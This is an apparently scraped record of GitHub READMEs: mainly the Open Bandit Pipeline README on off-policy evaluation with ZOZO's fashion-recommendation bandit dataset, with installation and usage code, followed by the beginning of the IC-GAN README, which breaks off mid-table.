"
\n\n[![pypi](https://img.shields.io/pypi/v/obp.svg)](https://pypi.python.org/pypi/obp)\n[![Python](https://img.shields.io/badge/python-3.7%20%7C%203.8%20%7C%203.9-blue)](https://www.python.org)\n[![Downloads](https://pepy.tech/badge/obp)](https://pepy.tech/project/obp)\n![GitHub commit activity](https://img.shields.io/github/commit-activity/m/st-tech/zr-obp)\n![GitHub last commit](https://img.shields.io/github/last-commit/st-tech/zr-obp)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![arXiv](https://img.shields.io/badge/arXiv-2008.07146-b31b1b.svg)](https://arxiv.org/abs/2008.07146)\n\n[[arXiv]](https://arxiv.org/abs/2008.07146)\n\n# Open Bandit Pipeline: a research framework for bandit algorithms and off-policy evaluation\n\n**[Documentation](https://zr-obp.readthedocs.io/en/latest/)** | **[Google Group](https://groups.google.com/g/open-bandit-project)** | **[Tutorial](https://sites.google.com/cornell.edu/recsys2021tutorial)** | **[Installation](#installation)** | **[Usage](#usage)** | **[Slides](./slides/slides_JN.pdf)** | **[Quickstart](./examples/quickstart)** | **[Open Bandit Dataset](./obd/README_JN.md)** | **[Blog post (Japanese)](https://techblog.zozo.com/entry/openbanditproject)**\n\n
\n**Table of Contents**\n\n- [Open Bandit Pipeline: a research framework for bandit algorithms and off-policy evaluation](#open-bandit-pipeline-a-research-framework-for-bandit-algorithms-and-off-policy-evaluation)\n- [Overview](#overview)\n - [Open Bandit Dataset](#open-bandit-dataset)\n - [Open Bandit Pipeline](#open-bandit-pipeline)\n - [Implemented bandit algorithms and OPE estimators](#implemented-bandit-algorithms-and-ope-estimators)\n - [Topics and tasks](#topics-and-tasks)\n- [Installation](#installation)\n - [Dependencies](#dependencies)\n- [Usage](#usage)\n - [(1) Data loading and preprocessing](#1-data-loading-and-preprocessing)\n - [(2) Off-policy learning](#2-off-policy-learning)\n - [(3) Off-policy evaluation](#3-off-policy-evaluation)\n- [Citation](#citation)\n- [Google Group](#google-group)\n- [License](#license)\n- [Project team](#project-team)\n- [Contact](#contact)\n- [References](#references)\n\n
\n\n# Overview\n\n## Open Bandit Dataset\n\n*Open Bandit Dataset* is a large-scale public real-world dataset intended to facilitate research on bandit algorithms and off-policy evaluation.\nThe dataset is provided by [ZOZO, Inc.](https://corp.zozo.com/about/profile/), the largest fashion e-commerce company in Japan.\nOn [ZOZOTOWN](https://zozo.jp/), the large-scale fashion e-commerce site operated by the company, several multi-armed bandit algorithms are used to recommend fashion items to users.\nFigure 1 below shows an example of fashion item recommendation by a bandit algorithm: for each user request, three fashion items are recommended at the same time.\n\n
*Figure 1. An example of fashion item recommendations on ZOZOTOWN.*
\n\n\nThe data were collected during a 7-day experiment in late November 2019 on three \"campaigns\", corresponding to all items (all), men's items (men), and women's items (women).\nIn each campaign, either a uniformly random policy (Random) or a Thompson sampling policy (Bernoulli Thompson Sampling; Bernoulli TS) was randomly chosen and applied to each user impression.\nFigure 2 shows descriptive statistics of Open Bandit Dataset.\n\n
*Figure 2. Descriptive statistics of Open Bandit Dataset for each campaign and data collection policy.*
\n\n\nA small-sized version of the data for running the [examples](./examples) is available at [./obd/](./obd).\nThe full-size version of Open Bandit Dataset is available at [https://research.zozo.com/data.html](https://research.zozo.com/data.html).\nUse the small-sized version for quick checks and the full-size version for research purposes.\n\n## Open Bandit Pipeline\n\n*Open Bandit Pipeline* is a Python package that makes it easy to preprocess the dataset, perform off-policy learning, and evaluate off-policy estimators.\nWith Open Bandit Pipeline, researchers can focus on implementing their off-policy estimator (OPE estimator) and compare its performance with other methods in a realistic and reproducible way.\nFor an introduction to off-policy evaluation, see [this blog post](https://techblog.zozo.com/entry/openbanditproject) (in Japanese).\n\n
*Figure 3. Structure of Open Bandit Pipeline.*
\n\nOpen Bandit Pipeline consists of the following main modules.\n\n- [**dataset module**](./obp/dataset): This module provides a data loader class for Open Bandit Dataset and a flexible interface for preprocessing the data. It also implements classes for generating synthetic bandit data and for converting multi-class classification data into bandit data.\n- [**policy module**](./obp/policy): This module provides interfaces for bandit algorithms, together with implementations of several standard bandit algorithms.\n- [**ope module**](./obp/ope): This module implements several standard off-policy estimators and provides an interface for implementing new ones.\n\n\n### Implemented bandit algorithms and OPE estimators\n\n
\n**Bandit algorithms (implemented in the policy module)**\n\n- Online\n - Non-Contextual (Context-free)\n - Random\n - Epsilon Greedy\n - Bernoulli Thompson Sampling\n - Contextual (Linear)\n - Linear Epsilon Greedy\n - [Linear Thompson Sampling](http://proceedings.mlr.press/v28/agrawal13)\n - [Linear Upper Confidence Bound](https://dl.acm.org/doi/pdf/10.1145/1772690.1772758)\n - Contextual (Logistic)\n - Logistic Epsilon Greedy\n - [Logistic Thompson Sampling](https://papers.nips.cc/paper/4321-an-empirical-evaluation-of-thompson-sampling)\n - [Logistic Upper Confidence Bound](https://dl.acm.org/doi/10.1145/2396761.2396767)\n- Offline (Off-Policy Learning)\n - [Inverse Probability Weighting (IPW) Learner](https://arxiv.org/abs/1503.02834)\n - Neural Network-based Policy Learner\n\n
\n\n
\n**OPE estimators (implemented in the ope module)**\n\n- OPE of Online Bandit Algorithms\n - [Replay Method (RM)](https://arxiv.org/abs/1003.5956)\n- OPE of Offline Bandit Algorithms\n - [Direct Method (DM)](https://arxiv.org/abs/0812.4044)\n - [Inverse Probability Weighting (IPW)](https://scholarworks.umass.edu/cgi/viewcontent.cgi?article=1079&context=cs_faculty_pubs)\n - [Self-Normalized Inverse Probability Weighting (SNIPW)](https://papers.nips.cc/paper/5748-the-self-normalized-estimator-for-counterfactual-learning)\n - [Doubly Robust (DR)](https://arxiv.org/abs/1503.02834)\n - [Switch Estimators](https://arxiv.org/abs/1612.01205)\n - [More Robust Doubly Robust (MRDR)](https://arxiv.org/abs/1802.03493)\n - [Doubly Robust with Optimistic Shrinkage (DRos)](https://arxiv.org/abs/1907.09623)\n - [Double Machine Learning (DML)](https://arxiv.org/abs/2002.08536)\n- OPE of Offline Slate Bandit Algorithms\n - [Independent Inverse Propensity Scoring (IIPS)](https://arxiv.org/abs/1804.10488)\n - [Reward Interaction Inverse Propensity Scoring (RIPS)](https://arxiv.org/abs/2007)\n- OPE of Offline Bandit Algorithms with Continuous Actions\n - [Kernelized Inverse Probability Weighting](https://arxiv.org/abs/1802.06037)\n - [Kernelized Self-Normalized Inverse Probability Weighting](https://arxiv.org/abs/1802.06037)\n - [Kernelized Doubly Robust](https://arxiv.org/abs/1802.06037)\n\n
\n\nIn addition to the algorithms and off-policy estimators listed above, Open Bandit Pipeline provides flexible interfaces.\nResearchers can therefore easily implement their own bandit algorithms or estimators and evaluate their performance.\nMoreover, Open Bandit Pipeline includes an interface for handling real-world bandit feedback data.\nPractitioners such as engineers and data scientists can thus combine their own datasets with Open Bandit Pipeline and easily run off-policy evaluation.\n\n## Topics and tasks\n\nWith Open Bandit Dataset and Open Bandit Pipeline, you can run experimental evaluations on the following research topics.\n\n- **Evaluation of Bandit Algorithms**: Open Bandit Dataset contains a large-scale log collected by a uniformly random policy. Using it, you can evaluate the performance of new online bandit algorithms.\n\n- **Evaluation of Off-Policy Evaluation**: Open Bandit Dataset consists of logs generated by running multiple policies simultaneously on a production system, and Open Bandit Pipeline can reproduce the policies used for data collection. For this reason, the estimation accuracy of off-policy estimators can be evaluated (see the sketch below).
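\n\nAs a concrete, purely illustrative example of the second task, one can compare an OPE estimate of Bernoulli TS's value, obtained from the Random log as in the Usage section below, against the ground-truth on-policy value computed directly from the Bernoulli TS log. The identifier `'bts'` for the Thompson sampling log and the use of the mean observed reward as the on-policy value are assumptions based on the dataset layout described above:\n\n```python\n# Sketch: ground-truth (on-policy) value of Bernoulli TS from its own log.\n# Compare this with the IPW estimate computed from the Random log (see Usage).\nfrom obp.dataset import OpenBanditDataset\n\nbts_feedback = OpenBanditDataset(\n    behavior_policy='bts', campaign='all'\n).obtain_batch_bandit_feedback()\nground_truth = bts_feedback['reward'].mean()\n# relative_error = abs(estimated_policy_value['ipw'] - ground_truth) / ground_truth\n```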
\n\n\n# Installation\n\nOpen Bandit Pipeline can be installed with `pip` as follows.\n\n```bash\npip install obp\n```\n\nYou can also clone this repository and set it up from source.\n\n```bash\ngit clone https://github.com/st-tech/zr-obp\ncd zr-obp\npython setup.py install\n```\n\nThe supported Python version and package versions are as follows.\n\n```\n[tool.poetry.dependencies]\npython = \">=3.7.1,<3.10\"\ntorch = \"^1.9.0\"\nscikit-learn = \"^0.24.2\"\npandas = \"^1.3.2\"\nnumpy = \"^1.21.2\"\nmatplotlib = \"^3.4.3\"\ntqdm = \"^4.62.2\"\nscipy = \"^1.7.1\"\nPyYAML = \"^5.4.1\"\nseaborn = \"^0.11.2\"\npyieoe = \"^0.1.1\"\npingouin = \"^0.4.0\"\n```\n\nNote that if your package versions differ from these, the usage and behavior may differ from what is described here.\n\n# Usage\n\nThis section explains how to use Open Bandit Pipeline. As a concrete example, we implement the flow of evaluating the performance of a Thompson sampling policy offline using Open Bandit Dataset.
\nFor off-policy evaluation with synthetic data or multi-class classification data, please see the [English README](https://github.com/st-tech/zr-obp/blob/master/README.md) and [examples/quickstart/](https://github.com/st-tech/zr-obp/tree/master/examples/quickstart).\n\nAs shown below, the whole off-policy evaluation flow can be implemented in about ten lines of code.\n\n```python\n# Evaluate the performance of BernoulliTS offline, using Inverse Probability Weighting\n# and the log data generated by the uniformly random policy\nfrom obp.dataset import OpenBanditDataset\nfrom obp.policy import BernoulliTS\nfrom obp.ope import OffPolicyEvaluation, InverseProbabilityWeighting as IPW\n\n# (1) Data loading and preprocessing\ndataset = OpenBanditDataset(behavior_policy='random', campaign='all')\nbandit_feedback = dataset.obtain_batch_bandit_feedback()\n\n# (2) Off-policy learning\nevaluation_policy = BernoulliTS(\n n_actions=dataset.n_actions,\n len_list=dataset.len_list,\n is_zozotown_prior=True,\n campaign=\"all\",\n random_state=12345\n)\naction_dist = evaluation_policy.compute_batch_action_dist(\n n_sim=100000, n_rounds=bandit_feedback[\"n_rounds\"]\n)\n\n# (3) Off-policy evaluation\nope = OffPolicyEvaluation(bandit_feedback=bandit_feedback, ope_estimators=[IPW()])\nestimated_policy_value = ope.estimate_policy_values(action_dist=action_dist)\n\n# Improvement rate of Bernoulli TS over the random policy (relative click-through rate)\nrelative_policy_value_of_bernoulli_ts = estimated_policy_value['ipw'] / bandit_feedback['reward'].mean()\nprint(relative_policy_value_of_bernoulli_ts)\n1.198126...\n```\n\nThe important steps are explained below.\n\n## (1) Data loading and preprocessing\n\nOpen Bandit Pipeline provides a data loading interface for Open Bandit Dataset.\nUsing it, loading and preprocessing Open Bandit Dataset can be done concisely.\n\n```python\n# Load the log data collected by the random policy in the \"all items\" campaign.\n# The OpenBanditDataset class takes the policy that collected the data and the campaign.\ndataset = OpenBanditDataset(behavior_policy='random', campaign='all')\n\n# Obtain the log data used for off-policy learning and off-policy evaluation.\nbandit_feedback = dataset.obtain_batch_bandit_feedback()\n\nprint(bandit_feedback.keys())\n# dict_keys(['n_rounds', 'n_actions', 'action', 'position', 'reward', 'pscore', 'context', 'action_context'])\n```\n\nYou can also implement your own feature engineering in the `pre_process` method of the `obp.dataset.OpenBanditDataset` class. [`custom_dataset.py`](https://github.com/st-tech/zr-obp/blob/master/benchmark/cf_policy_search/custom_dataset.py) shows an example of implementing new feature engineering. In addition, by implementing a new class that follows the interface of the `obp.dataset.BaseBanditDataset` class, you can handle future bandit datasets other than Open Bandit Dataset, or your own in-house bandit data.\n\n
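As a minimal, purely illustrative sketch of that last point (it assumes only what is used above, namely that a dataset class must provide `obtain_batch_bandit_feedback()` returning a dictionary with the same keys as `OpenBanditDataset`):\n\n```python\n# Sketch: a synthetic dataset class following the BaseBanditDataset interface.\nimport numpy as np\nfrom obp.dataset import BaseBanditDataset\n\n\nclass UniformLoggedDataset(BaseBanditDataset):\n    def __init__(self, n_rounds: int, n_actions: int, dim_context: int = 5, seed: int = 12345):\n        self.n_rounds, self.n_actions, self.dim_context = n_rounds, n_actions, dim_context\n        self.random_ = np.random.RandomState(seed)\n\n    def obtain_batch_bandit_feedback(self) -> dict:\n        return dict(\n            n_rounds=self.n_rounds,\n            n_actions=self.n_actions,\n            context=self.random_.normal(size=(self.n_rounds, self.dim_context)),\n            action_context=np.eye(self.n_actions),\n            action=self.random_.randint(self.n_actions, size=self.n_rounds),\n            position=np.zeros(self.n_rounds, dtype=int),  # single recommendation slot\n            reward=self.random_.binomial(n=1, p=0.05, size=self.n_rounds),\n            pscore=np.full(self.n_rounds, 1.0 / self.n_actions),  # uniform logging policy\n        )\n```\n\n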
# dict_keys(['n_rounds', 'n_actions', 'action', 'position', 'reward', 'pscore', 'context', 'action_context'])
```

You can also implement your own feature engineering in the `pre_process` method of the `obp.dataset.OpenBanditDataset` class. [`custom_dataset.py`](https://github.com/st-tech/zr-obp/blob/master/benchmark/cf_policy_search/custom_dataset.py) shows an example of implementing new feature engineering. In addition, by implementing a new class that follows the interface of the `obp.dataset.BaseBanditDataset` class, you can handle bandit datasets other than the Open Bandit Dataset that may be released in the future, as well as bandit data specific to your own company.

## (2) Off-Policy Learning

After the preprocessing, **off-policy learning** is run as follows.

```python
# Define the algorithm to be evaluated. Here, the Bernoulli TS policy is evaluated offline.
# Researchers can also use bandit policies they have implemented themselves.
evaluation_policy = BernoulliTS(
    n_actions=dataset.n_actions,
    len_list=dataset.len_list,
    is_zozotown_prior=True,  # reproduce the behavior on ZOZOTOWN
    campaign="all",
    random_state=12345
)
# Compute the action choice probabilities of the Bernoulli TS policy via simulation.
action_dist = evaluation_policy.compute_batch_action_dist(
    n_sim=100000, n_rounds=bandit_feedback["n_rounds"]
)
```

The `compute_batch_action_dist` method of `BernoulliTS` computes, via simulation, the action choice probabilities (`action_dist`) based on the given Beta distribution parameters.
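As a concrete illustration of the `pre_process` hook mentioned in step (1) above, here is a minimal sketch (not the repository's `custom_dataset.py` example) that appends one extra hand-crafted context feature. The no-argument signature of `pre_process` and the `self.context` attribute touched here are assumptions that should be checked against the obp source.

```python
from dataclasses import dataclass

import numpy as np
from obp.dataset import OpenBanditDataset


@dataclass
class OBDWithExtraFeature(OpenBanditDataset):
    """OpenBanditDataset with one additional hand-crafted context feature (illustrative only)."""

    def pre_process(self) -> None:
        # run the default preprocessing first, then append the row-wise mean
        # of the existing context features as an extra column
        super().pre_process()
        self.context = np.c_[self.context, self.context.mean(axis=1)]
```

An instance of such a class can then replace `OpenBanditDataset` in step (1), leaving the rest of the pipeline unchanged.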
Users can also implement their own bandit algorithms by following the interface implemented in [`./obp/policy/base.py`](https://github.com/st-tech/zr-obp/blob/master/obp/policy/base.py) and evaluate their performance.


## (3) Off-Policy Evaluation

The final step is **off-policy evaluation**, which evaluates the performance of a bandit algorithm offline using the logged data.
With Open Bandit Pipeline, off-policy evaluation can be implemented as follows.

```python
# Evaluate the performance of the Bernoulli TS policy offline with the IPW estimator.
# The OffPolicyEvaluation class takes the logged bandit data used for the offline evaluation and the estimators to use (multiple estimators can be specified).
ope = OffPolicyEvaluation(bandit_feedback=bandit_feedback, ope_estimators=[IPW()])
estimated_policy_value = ope.estimate_policy_values(action_dist=action_dist)
print(estimated_policy_value)
{'ipw': 0.004553...}  # a dictionary containing the performance estimates of the configured off-policy estimators.

# Compare the estimated performance of the Bernoulli TS policy with the ground-truth performance of the Random policy.
relative_policy_value_of_bernoulli_ts = estimated_policy_value['ipw'] / bandit_feedback['reward'].mean()
# Off-policy evaluation estimates that the Bernoulli TS policy outperforms the Random policy by 19.81%.
print(relative_policy_value_of_bernoulli_ts)
1.198126...
```

You can also implement your own off-policy estimators by following the interface of the `obp.ope.BaseOffPolicyEstimator` class, which makes it possible to examine the estimation accuracy of new off-policy estimators. In addition, by specifying multiple off-policy estimators in the `ope_estimators` argument of `obp.ope.OffPolicyEvaluation`, you can obtain estimates from several estimators at once.
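To make the computation behind the IPW estimate above concrete, the following is a minimal NumPy sketch that uses only the `bandit_feedback` keys shown in step (1) and the standard IPW formula. It is an illustration rather than obp's implementation, and it assumes that `action_dist` has shape `(n_rounds, n_actions, len_list)`; a real custom estimator should instead follow the `BaseOffPolicyEstimator` interface mentioned above.

```python
import numpy as np


def ipw_policy_value(bandit_feedback: dict, action_dist: np.ndarray) -> float:
    """Average of importance-weighted observed rewards (the IPW estimate)."""
    rounds = np.arange(bandit_feedback["n_rounds"])
    # probability that the evaluation policy picks the logged action at the logged position
    pi_e = action_dist[rounds, bandit_feedback["action"], bandit_feedback["position"]]
    importance_weight = pi_e / bandit_feedback["pscore"]
    return float(np.mean(importance_weight * bandit_feedback["reward"]))
```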
Note that `bandit_feedback['reward'].mean()` is the empirical mean of the observed rewards (an on-policy estimate) and represents the ground-truth performance of the Random policy.


# Citation
If you write a paper, blog post, or other article using the Open Bandit Dataset or Open Bandit Pipeline, please cite the following paper:

Yuta Saito, Shunsuke Aihara, Megumi Matsutani, Yusuke Narita.
**Open Bandit Dataset and Pipeline: Towards Realistic and Reproducible Off-Policy Evaluation**
[https://arxiv.org/abs/2008.07146](https://arxiv.org/abs/2008.07146)

Bibtex:
```
@article{saito2020open,
  title={Open Bandit Dataset and Pipeline: Towards Realistic and Reproducible Off-Policy Evaluation},
  author={Saito, Yuta and Aihara, Shunsuke and Matsutani, Megumi and Narita, Yusuke},
  journal={arXiv preprint arXiv:2008.07146},
  year={2020}
}
```

# Google Group
The latest information about this project is announced via the following Google Group; please feel free to join: https://groups.google.com/g/open-bandit-project

# Contribution
Any contribution to Open Bandit Pipeline is welcome. Please refer to [CONTRIBUTING.md](./CONTRIBUTING.md) for the guidelines on how to contribute to the project.

# License
This project is licensed under the Apache 2.0 license. See [LICENSE](https://github.com/st-tech/zr-obp/blob/master/LICENSE) for details.

# Project Team

- [Yuta Saito](https://usait0.com/ja/) (**Main Contributor**; Hanjuku-kaso Co., Ltd. / Cornell University)
- [Shunsuke Aihara](https://www.linkedin.com/in/shunsukeaihara/) (ZOZO Research)
- Megumi Matsutani (ZOZO Research)
- [Yusuke Narita](https://www.yusuke-narita.com/) (Hanjuku-kaso Co., Ltd. / Yale University)

## Developers
- [Masahiro Nomura](https://twitter.com/nomuramasahir0) (CyberAgent, Inc. / Hanjuku-kaso Co., Ltd.)
- [Koichi Takayama](https://fullflu.hatenablog.com/) (Hanjuku-kaso Co., Ltd.)
- [Ryo Kuroiwa](https://kurorororo.github.io) (University of Toronto / Hanjuku-kaso Co., Ltd.)
- [Haruka Kiyohara](https://sites.google.com/view/harukakiyohara) (Tokyo Institute of Technology / Hanjuku-kaso Co., Ltd.)

# Contact
For any questions about the paper, the Open Bandit Dataset, or Open Bandit Pipeline, please contact: saito@hanjuku-kaso.com

# References

\n\u8ad6\u6587\n\n1. Alina Beygelzimer and John Langford. [The offset tree for learning with partial labels](https://arxiv.org/abs/0812.4044). In *Proceedings of the 15th ACM SIGKDD International Conference on Knowledge Discovery&Data Mining*, 129\u2013138, 2009.\n\n2. Olivier Chapelle and Lihong Li. [An empirical evaluation of thompson sampling](https://papers.nips.cc/paper/4321-an-empirical-evaluation-of-thompson-sampling). In *Advances in Neural Information Processing Systems*, 2249\u20132257, 2011.\n\n3. Lihong Li, Wei Chu, John Langford, and Xuanhui Wang. [Unbiased Offline Evaluation of Contextual-bandit-based News Article Recommendation Algorithms](https://arxiv.org/abs/1003.5956). In *Proceedings of the Fourth ACM International Conference on Web Search and Data Mining*, 297\u2013306, 2011.\n\n4. Alex Strehl, John Langford, Lihong Li, and Sham M Kakade. [Learning from Logged Implicit Exploration Data](https://arxiv.org/abs/1003.0120). In *Advances in Neural Information Processing Systems*, 2217\u20132225, 2010.\n\n5. Doina Precup, Richard S. Sutton, and Satinder Singh. [Eligibility Traces for Off-Policy Policy Evaluation](https://scholarworks.umass.edu/cgi/viewcontent.cgi?article=1079&context=cs_faculty_pubs). In *Proceedings of the 17th International Conference on Machine Learning*, 759\u2013766. 2000.\n\n6. Miroslav Dud\u00edk, Dumitru Erhan, John Langford, and Lihong Li. [Doubly Robust Policy Evaluation and Optimization](https://arxiv.org/abs/1503.02834). *Statistical Science*, 29:485\u2013511, 2014.\n\n7. Adith Swaminathan and Thorsten Joachims. [The Self-normalized Estimator for Counterfactual Learning](https://papers.nips.cc/paper/5748-the-self-normalized-estimator-for-counterfactual-learning). In *Advances in Neural Information Processing Systems*, 3231\u20133239, 2015.\n\n8. Dhruv Kumar Mahajan, Rajeev Rastogi, Charu Tiwari, and Adway Mitra. [LogUCB: An Explore-Exploit Algorithm for Comments Recommendation](https://dl.acm.org/doi/10.1145/2396761.2396767). In *Proceedings of the 21st ACM international conference on Information and knowledge management*, 6\u201315. 2012.\n\n9. Lihong Li, Wei Chu, John Langford, Taesup Moon, and Xuanhui Wang. [An Unbiased Offline Evaluation of Contextual Bandit Algorithms with Generalized Linear Models](http://proceedings.mlr.press/v26/li12a.html). In *Journal of Machine Learning Research: Workshop and Conference Proceedings*, volume 26, 19\u201336. 2012.\n\n10. Yu-Xiang Wang, Alekh Agarwal, and Miroslav Dudik. [Optimal and Adaptive Off-policy Evaluation in Contextual Bandits](https://arxiv.org/abs/1612.01205). In *Proceedings of the 34th International Conference on Machine Learning*, 3589\u20133597. 2017.\n\n11. Mehrdad Farajtabar, Yinlam Chow, and Mohammad Ghavamzadeh. [More Robust Doubly Robust Off-policy Evaluation](https://arxiv.org/abs/1802.03493). In *Proceedings of the 35th International Conference on Machine Learning*, 1447\u20131456. 2018.\n\n12. Nathan Kallus and Masatoshi Uehara. [Intrinsically Efficient, Stable, and Bounded Off-Policy Evaluation for Reinforcement Learning](https://arxiv.org/abs/1906.03735). In *Advances in Neural Information Processing Systems*. 2019.\n\n13. Yi Su, Lequn Wang, Michele Santacatterina, and Thorsten Joachims. [CAB: Continuous Adaptive Blending Estimator for Policy Evaluation and Learning](https://proceedings.mlr.press/v97/su19a). In *Proceedings of the 36th International Conference on Machine Learning*, 6005-6014, 2019.\n\n14. Yi Su, Maria Dimakopoulou, Akshay Krishnamurthy, and Miroslav Dud\u00edk. 
[Doubly Robust Off-policy Evaluation with Shrinkage](https://proceedings.mlr.press/v119/su20a.html). In *Proceedings of the 37th International Conference on Machine Learning*, 9167-9176, 2020.\n\n15. Nathan Kallus and Angela Zhou. [Policy Evaluation and Optimization with Continuous Treatments](https://arxiv.org/abs/1802.06037). In *International Conference on Artificial Intelligence and Statistics*, 1243\u20131251. PMLR, 2018.\n\n16. Aman Agarwal, Soumya Basu, Tobias Schnabel, and Thorsten Joachims. [Effective Evaluation using Logged Bandit Feedback from Multiple Loggers](https://arxiv.org/abs/1703.06180). In *Proceedings of the 23rd ACM SIGKDD international conference on Knowledge discovery and data mining*, 687\u2013696, 2017.\n\n17. Nathan Kallus, Yuta Saito, and Masatoshi Uehara. [Optimal Off-Policy Evaluation from Multiple Logging Policies](http://proceedings.mlr.press/v139/kallus21a.html). In *Proceedings of the 38th International Conference on Machine Learning*, 5247-5256, 2021.\n\n18. Shuai Li, Yasin Abbasi-Yadkori, Branislav Kveton, S Muthukrishnan, Vishwa Vinay, and Zheng Wen. [Offline Evaluation of Ranking Policies with Click Models](https://arxiv.org/pdf/1804.10488). In *Proceedings of the 24th ACM SIGKDD International Conference on Knowledge Discovery&Data Mining*, 1685\u20131694, 2018.\n\n19. James McInerney, Brian Brost, Praveen Chandar, Rishabh Mehrotra, and Benjamin Carterette. [Counterfactual Evaluation of Slate Recommendations with Sequential Reward Interactions](https://arxiv.org/abs/2007.12986). In *Proceedings of the 26th ACM SIGKDD International Conference on Knowledge Discovery&Data Mining*, 1779\u20131788, 2020.\n\n20. Yusuke Narita, Shota Yasui, and Kohei Yata. [Debiased Off-Policy Evaluation for Recommendation Systems](https://dl.acm.org/doi/10.1145/3460231.3474231). In *Proceedings of the Fifteenth ACM Conference on Recommender Systems*, 372-379, 2021.\n\n21. Weihua Hu, Matthias Fey, Marinka Zitnik, Yuxiao Dong, Hongyu Ren, Bowen Liu, Michele Catasta, and Jure Leskovec. [Open Graph Benchmark: Datasets for Machine Learning on Graphs](https://arxiv.org/abs/2005.00687). In *Advances in Neural Information Processing Systems*. 2020.\n\n22. Noveen Sachdeva, Yi Su, and Thorsten Joachims. [Off-policy Bandits with Deficient Support](https://dl.acm.org/doi/10.1145/3394486.3403139). In *Proceedings of the 26th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining*, 965-975, 2021.\n\n23. Yi Su, Pavithra Srinath, and Akshay Krishnamurthy. [Adaptive Estimator Selection for Off-Policy Evaluation](https://proceedings.mlr.press/v119/su20d.html). In *Proceedings of the 38th International Conference on Machine Learning*, 9196-9205, 2021.\n\n24. Haruka Kiyohara, Yuta Saito, Tatsuya Matsuhiro, Yusuke Narita, Nobuyuki Shimizu, Yasuo Yamamoto. [Doubly Robust Off-Policy Evaluation for Ranking Policies under the Cascade Behavior Model](https://dl.acm.org/doi/10.1145/3488560.3498380). In *Proceedings of the Fifteenth ACM International Conference on Web Search and Data Mining*, 487-497, 2022.\n\n25. Yuta Saito and Thorsten Joachims. [Off-Policy Evaluation for Large Action Spaces via Embeddings](https://arxiv.org/abs/2202.06317). In *Proceedings of the 39th International Conference on Machine Learning*, 2022.\n\n
\n\n
Open-Source Projects

This project was developed with reference to **Open Graph Benchmark** ([[github](https://github.com/snap-stanford/ogb)] [[project page](https://ogb.stanford.edu)] [[paper](https://arxiv.org/abs/2005.00687)]).
\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "facebookresearch/ic_gan", "link": "https://github.com/facebookresearch/ic_gan", "tags": [], "stars": 514, "description": "Official repository for the paper \"Instance-Conditioned GAN\" by Arantxa Casanova, Marlene Careil, Jakob Verbeek, Micha\u0142 Dro\u017cd\u017cal, Adriana Romero-Soriano.", "lang": "Python", "repo_lang": "", "readme": "# IC-GAN: Instance-Conditioned GAN

Official Pytorch code of [Instance-Conditioned GAN](https://arxiv.org/abs/2109.05070) by Arantxa Casanova, Marlène Careil, Jakob Verbeek, Michał Drożdżal, Adriana Romero-Soriano.
![IC-GAN results](./figures/github_image.png?raw=true)

## Generate images with IC-GAN in a Colab Notebook
We provide a [Google Colab notebook](https://colab.research.google.com/github/facebookresearch/ic_gan/blob/main/inference/icgan_colab.ipynb) to generate images with IC-GAN and its class-conditional counterpart. We also invite users to check out the [demo on Replicate](https://replicate.ai/arantxacasanova/ic_gan), courtesy of [Replicate](https://replicate.ai/home).

The figure below depicts two instances, unseen during training and downloaded from [Creative Commons search](https://search.creativecommons.org), and the images generated with IC-GAN and class-conditional IC-GAN when conditioning on the class "castle":

*(figure: the two instance conditionings and the corresponding IC-GAN and class-conditional IC-GAN generations)*
\n\nAdditionally, and inspired by [this Colab](https://colab.research.google.com/github/eyaler/clip_biggan/blob/main/ClipBigGAN.ipynb), we provide the funcionality in the same Colab notebook to guide generations with text captions, using the [CLIP model](https://github.com/openai/CLIP). \nAs an example, the following Figure shows three instance conditionings and a text caption (top), followed by the resulting generated images with IC-GAN (bottom), when optimizing the noise vector following CLIP's gradient for 100 iterations. \n

\n \n

\n\n\n*Credit for the three instance conditionings, from left to right, that were modified with a resize and central crop:* [1: \"Landscape in Bavaria\" by shining.darkness, licensed under CC BY 2.0](https://search.creativecommons.org/photos/92ef279c-4469-49a5-aa4b-48ad746f2dc4), [2: \"Fantasy Landscape - slolsss\" by Douglas Tofoli is marked with CC PDM 1.0](https://search.creativecommons.org/photos/13646adc-f1df-437a-a0dd-8223452ee46c), [3: \"How to Draw Landscapes Simply\" by Kuwagata Keisai is marked with CC0 1.0](https://search.creativecommons.org/photos/2ab9c3b7-de99-4536-81ed-604ee988bd5f)\n\n\n## Requirements\n* Python 3.8 \n* Cuda v10.2 / Cudnn v7.6.5\n* gcc v7.3.0\n* Pytorch 1.8.0\n* A conda environment can be created from `environment.yaml` by entering the command: `conda env create -f environment.yml`, that contains the aforemention version of Pytorch and other required packages. \n* Faiss: follow the instructions in the [original repository](https://github.com/facebookresearch/faiss).\n\n\n## Overview \n\nThis repository consists of four main folders:\n* `data_utils`: A common folder to obtain and format the data needed to train and test IC-GAN, agnostic of the specific backbone. \n* `inference`: Scripts to test the models both qualitatively and quantitatively.\n* `BigGAN_PyTorch`: It provides the training, evaluation and sampling scripts for IC-GAN with a BigGAN backbone. The code base comes from [Pytorch BigGAN repository](https://github.com/ajbrock/BigGAN-PyTorch), made available under the MIT License. It has been modified to [add additional utilities](#biggan-changelog) and it enables IC-GAN training on top of it.\n* `stylegan2_ada_pytorch`: It provides the training, evaluation and sampling scripts for IC-GAN with a StyleGAN2 backbone. The code base comes from [StyleGAN2 Pytorch](https://github.com/NVlabs/stylegan2-ada-pytorch), made available under the [Nvidia Source Code License](https://nvlabs.github.io/stylegan2-ada-pytorch/license.html). It has been modified to [add additional utilities](#stylegan-changelog) and it enables IC-GAN training on top of it.\n\n\n## (Python script) Generate images with IC-GAN\nAlternatively, we can generate images with IC-GAN models directly from a python script, by following the next steps:\n1) Download the desired pretrained models (links below) and the [pre-computed 1000 instance features from ImageNet](https://dl.fbaipublicfiles.com/ic_gan/stored_instances.tar.gz) and extract them into a folder `pretrained_models_path`. \n\n| model | backbone | class-conditional? 
